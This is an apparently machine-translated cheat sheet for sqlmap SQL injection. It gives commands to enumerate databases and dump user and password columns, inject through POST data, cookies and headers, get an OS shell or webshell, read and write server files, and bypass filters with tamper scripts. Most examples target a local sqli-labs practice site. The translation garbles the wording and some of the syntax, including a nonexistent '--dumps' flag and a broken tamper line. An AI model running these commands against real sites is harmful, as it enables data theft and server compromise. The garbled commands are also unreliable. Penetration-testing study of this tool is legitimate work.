Others attach a summary: https://www.cnblogs.com/ichunqiu/p/5805108.html
Sqlmap a basic statement:
python sqlmap.py -u "http://xxxxx/x?id=1" --dbs(或者--current-db) python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name --tables python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name -T table_name --columns python sqlmap.py -u "http://xxxxx/x?id=1" -D database_name -T table_name -C "id,user,password" --dumps
The parameters used
- implantation technique sqlmap in - BATCH selected by default, automatically run --current- db current database --current- the User current database user name - IS - dba to see whether the current user administrator privileges - the Data Type POST post data injection - threads maximum concurrent threads (not to exceed 10) - header file r http request header with the .txt
--cookie the cookie injection - level detection level, 3 the best, most comprehensive 5 --sql- shell run custom sql statement --os- shell to run the operating system command --file- the read to read the file from the database --file-the Write " native path ," --file-dest " server path " to upload files --tamper script comes with bypass
0x01 --technique parameters
-Technique is sqlmap the implantation technique, in which the support sqlmap different injection modes 5
B: Boolean-based- Blind (Boolean blind) E: Error - based (error type injection) U: of Union Query - based (co-injection) S: Starked queries (sqlmap by reading the file system, operating system, the registry must use this parameter, multiple-statement queries can be injected) T: Time -based Blind (based on the time delay injection)
For example sqlmap statement:
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-5/?id=1" --technique E --dbs --batch
0x02 --data parameters and parameter --threads
When injected into the post, after post data to put --data, - threads to speed up the run rate, not to exceed 10
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=1&passwd=11&submit=Submit" --technique UES --dbms mysql --dbs --threads 8
0x03 -r parameter
The HTTP request packet content in a txt file inside, cookie can not put, and keep up the path -r txt file, so sqlmap automatically run, pay attention here will likely appear on the back to keep the value of request parameters sql injection "*"symbol
python sqlmap.py -r 1.txt --dbs --threads 8 --technique BTES or python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 10 --technique BEST
If you know the exact location of sql injection, this way you can directly use the second injection
0x04 --cookie parameters
web based application authentication cookie, for the post request may specify cookie, a cookie is used as the injection parameter
sqlmap -u "url" --cookie="..." --level 3 –-dbs
0x05 --os-shell parameters
Know the database administrator privileges, and know the URL of the root directory, use this parameter, you can upload webshell and bounce shell.
Check whether the administrator privileges by --is-dba
0x06 --file-read parameters
Know the directory file directory files fixed sites, or the web server inside, you can use this parameter to read the contents of the file:
python sqlmap.py -u "http://127.0.0.1/?id=1" --file-read "C:/windows/win.ini"
0x07 --file-write --file-dest参数
--file-write "Native choose to upload a file path" --file-dest "server root directory path" know a site in the presence of sql injection and know the root of the site's premise can use this parameter
0x08 --tamper parameters
--tamper script with some special parameters, such sqlmap comes with a number of scripts to bypass
xxxx --tamper sqlmap.py Python " module name "